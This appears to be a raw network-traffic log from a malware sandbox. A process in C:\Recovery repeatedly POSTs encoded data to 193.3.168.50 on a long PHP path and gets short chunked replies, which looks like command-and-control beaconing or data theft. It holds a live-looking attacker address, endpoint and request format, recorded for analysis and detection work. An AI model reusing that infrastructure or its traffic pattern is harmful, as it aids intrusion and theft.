Dec 4, 2024 15:46:20.180922985 CET	1008	OUT	Data Raw: 5a 5b 5f 5c 59 59 5f 50 5a 58 51 52 55 57 5a 53 50 54 5d 52 59 59 57 44 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: Z[_\YY_PZXQRUWZSPT]RYYWD^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY-;V=X?90]7>,/94,V,0#%<(R#-^0=$!0R*=#G $],
Dec 4, 2024 15:46:21.070920944 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:21.305063009 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49836	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:21.582725048 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:21.930836916 CET	1012	OUT	Data Raw: 5a 59 5f 5e 5c 5a 5a 5f 5a 58 51 52 55 55 5a 5b 50 5e 5d 5e 59 52 57 48 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: ZY_^\ZZ_ZXQRUUZ[P^]^YRWH^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.X,06(X#\8<Y7+-+0,T!"=Y$.+58R>=#G $],-
Dec 4, 2024 15:46:22.974456072 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:23.107060909 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49839	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:23.400053978 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:23.758928061 CET	1012	OUT	Data Raw: 5f 50 5f 52 5c 5e 5a 53 5a 58 51 52 55 56 5a 52 50 52 5d 5b 59 5d 57 40 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _P_R\^ZSZXQRUVZRPR][Y]W@^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.8 6<:+#6-/1]#)4U, ?%?? 1)X0$5V+*#G $],!
Dec 4, 2024 15:46:24.678611040 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:24.912998915 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49843	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:24.509069920 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1888 Expect: 100-continue
Dec 4, 2024 15:46:24.868486881 CET	1888	OUT	Data Raw: 5a 5e 5a 5c 5c 5d 5a 50 5a 58 51 52 55 50 5a 5a 50 54 5d 59 59 5e 57 46 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: Z^Z\\]ZPZXQRUPZZPT]YY^WF^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY-/ ( Z4&_8! (S.0#['#T!Y$- 5((-#G $],
Dec 4, 2024 15:46:25.748217106 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:25.981106043 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 11 25 5b 24 15 3b 0d 24 2c 06 0b 2b 33 30 59 2d 0d 05 5e 33 3e 35 41 26 14 37 1f 28 39 33 12 36 13 35 04 3f 07 37 55 3c 0e 30 1a 3d 02 20 58 00 1a 26 5c 23 54 30 5b 2c 3a 30 59 32 3e 32 5c 33 03 26 06 29 39 0e 09 3d 30 38 52 32 3e 26 52 3e 20 2a 0c 3b 1a 21 5e 2d 2e 2a 5d 31 05 2a 52 0e 17 22 08 3d 07 38 1c 37 0f 25 54 29 0f 3c 00 28 06 2f 1f 27 28 2a 19 22 2e 26 0c 24 30 17 55 30 22 32 1e 33 01 3c 03 26 2c 38 58 2a 03 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%[$;$,+30Y-^3>5A&7(9365?7U<0= X&\#T0[,:0Y2>2\3&)9=08R2>&R> ;!^-.]1R"=87%T)<(/'(".&$0U0"23<&,8X* _. W1WT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49844	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:25.161123991 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:25.509021997 CET	1012	OUT	Data Raw: 5f 5c 5f 58 59 5e 5f 52 5a 58 51 52 55 50 5a 5c 50 51 5d 5b 59 59 57 49 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _\_XY^_RZXQRUPZ\PQ][YYWI^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY-, 9< !;/"7(.'Y$(S#T)$>$60=-#G $],
Dec 4, 2024 15:46:26.408436060 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:26.640872002 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49851	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:27.591543913 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1008 Expect: 100-continue
Dec 4, 2024 15:46:27.947801113 CET	1008	OUT	Data Raw: 5a 5d 5a 5b 59 5d 5f 54 5a 58 51 52 55 57 5a 5d 50 5f 5d 5e 59 53 57 45 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: Z]Z[Y]_TZXQRUWZ]P_]^YSWE^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.Y/)(*<[ !8<>4:;-3'<8S 5_%=8B63;>=#G $],=
Dec 4, 2024 15:46:28.930450916 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:29.160953045 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49858	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:30.344985008 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:30.696630001 CET	1012	OUT	Data Raw: 5a 5a 5f 5d 59 5d 5f 55 5a 58 51 52 55 55 5a 52 50 54 5d 53 59 58 57 49 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: ZZ_]Y]_UZXQRUUZRPT]SYXWI^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.^83&+9<] 6);2#+9#]',#42-'=##04U)#G $],-
Dec 4, 2024 15:46:31.692940950 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:31.933072090 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49862	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:31.115130901 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1888 Expect: 100-continue
Dec 4, 2024 15:46:31.462157011 CET	1888	OUT	Data Raw: 5a 59 5f 5d 59 57 5a 5e 5a 58 51 52 55 55 5a 59 50 51 5d 59 59 59 57 46 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: ZY_]YWZ^ZXQRUUZYPQ]YYYWF^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.Z8!]?9 6&],1X (-#]%?'73X B54S(-#G $],-
Dec 4, 2024 15:46:32.449049950 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:32.702038050 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 11 26 02 30 3b 24 54 33 3c 20 09 2b 23 3b 06 2e 0d 2b 12 24 3e 03 42 25 39 37 56 2a 3a 0e 02 21 5b 35 04 3f 39 37 56 3c 51 20 53 3e 02 20 58 00 1a 25 00 34 31 38 5b 39 39 0d 04 31 2e 31 05 30 5b 36 05 3e 39 01 53 29 0a 3f 0f 26 2e 04 14 29 1d 08 0b 38 1d 3a 06 2e 00 36 5c 31 3f 2a 52 0e 17 21 51 3e 58 3c 58 22 22 21 13 29 31 3b 14 3f 01 27 1f 24 06 32 1b 23 10 26 0f 30 33 3e 0c 25 32 3d 0e 25 2b 2b 13 25 59 24 58 2a 03 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&0;$T3< +#;.+$>B%97V:![5?97V<Q S> X%418[991.10[6>9S)?&.)8:.6\1?R!Q>X<X""!)1;?'$2#&03>%2=%++%Y$X* _. W1WT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49863	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:32.193655968 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:32.540335894 CET	1012	OUT	Data Raw: 5f 5a 5f 52 59 5e 5a 52 5a 58 51 52 55 53 5a 58 50 51 5d 5b 59 53 57 46 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _Z_RY^ZRZXQRUSZXPQ][YSWF^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY-/*?3#P:[;,.#;-U#X0/87=Y03"#$W>#G $],5
Dec 4, 2024 15:46:33.611274004 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:33.892024040 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49868	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:34.133877039 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:34.477924109 CET	1012	OUT	Data Raw: 5f 58 5a 58 59 57 5a 53 5a 58 51 52 55 55 5a 53 50 54 5d 52 59 5f 57 47 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _XZXYWZSZXQRUUZSPT]RY_WG^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.^;(4Z45:\,9#)/:3Y0/,V *$>+50)=#G $],-
Dec 4, 2024 15:46:35.386024952 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:35.668945074 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49873	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:35.935381889 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:36.293498993 CET	1012	OUT	Data Raw: 5f 5a 5f 53 59 59 5f 50 5a 58 51 52 55 55 5a 5d 50 53 5d 5f 59 59 57 47 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _Z_SYY_PZXQRUUZ]PS]_YYWG^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.,3"=9] *];X!9':',#!"X3='"=#G $],-
Dec 4, 2024 15:46:37.283505917 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:37.577596903 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49878	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:37.833101988 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:38.180798054 CET	1012	OUT	Data Raw: 5f 50 5f 5e 59 5b 5a 57 5a 58 51 52 55 5f 5a 53 50 55 5d 59 59 52 57 42 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _P_^Y[ZWZXQRU_ZSPU]YYRWB^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.Z- >?9 Y 68?=[#8U:$<3#1%Z08D58W)=#G $],
Dec 4, 2024 15:46:39.072877884 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:39.310673952 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49879	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:37.834846973 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1888 Expect: 100-continue
Dec 4, 2024 15:46:38.180891037 CET	1888	OUT	Data Raw: 5a 5b 5f 53 5c 5d 5a 53 5a 58 51 52 55 51 5a 5d 50 56 5d 5f 59 5b 57 46 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: Z[_S\]ZSZXQRUQZ]PV]_Y[WF^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY-/V%_+94!&.,Z4*8T:3;0/$ "%_$,D"V8R)#G $],=
Dec 4, 2024 15:46:39.072951078 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:39.310616970 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 11 26 01 25 28 24 55 27 3c 27 15 28 23 23 01 2d 1d 0a 06 24 3e 2e 19 31 14 27 1c 2a 14 2f 5a 35 03 04 5c 3f 17 06 0b 28 34 34 57 3e 12 20 58 00 1a 26 59 34 21 38 59 2d 2a 20 5a 24 2e 2d 04 33 3e 35 5c 29 00 33 1a 3f 20 23 0d 31 3e 07 08 29 0d 2d 52 3b 42 35 15 3a 2e 04 14 31 05 2a 52 0e 17 21 15 2a 10 37 07 22 22 3e 0f 2a 0f 3f 5c 29 2f 2c 0f 30 06 32 55 20 07 2a 0c 33 30 13 53 24 54 22 1f 25 28 3b 5b 31 2c 2f 01 2b 39 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&%($U'<'(##-$>.1'/Z5\?(44W> X&Y4!8Y- Z$.-3>5\)3? #1>)-R;B5:.1R!7"">?\)/,02U 30S$T"%(;[1,/+9 _. W1WT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49883	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:39.605309010 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
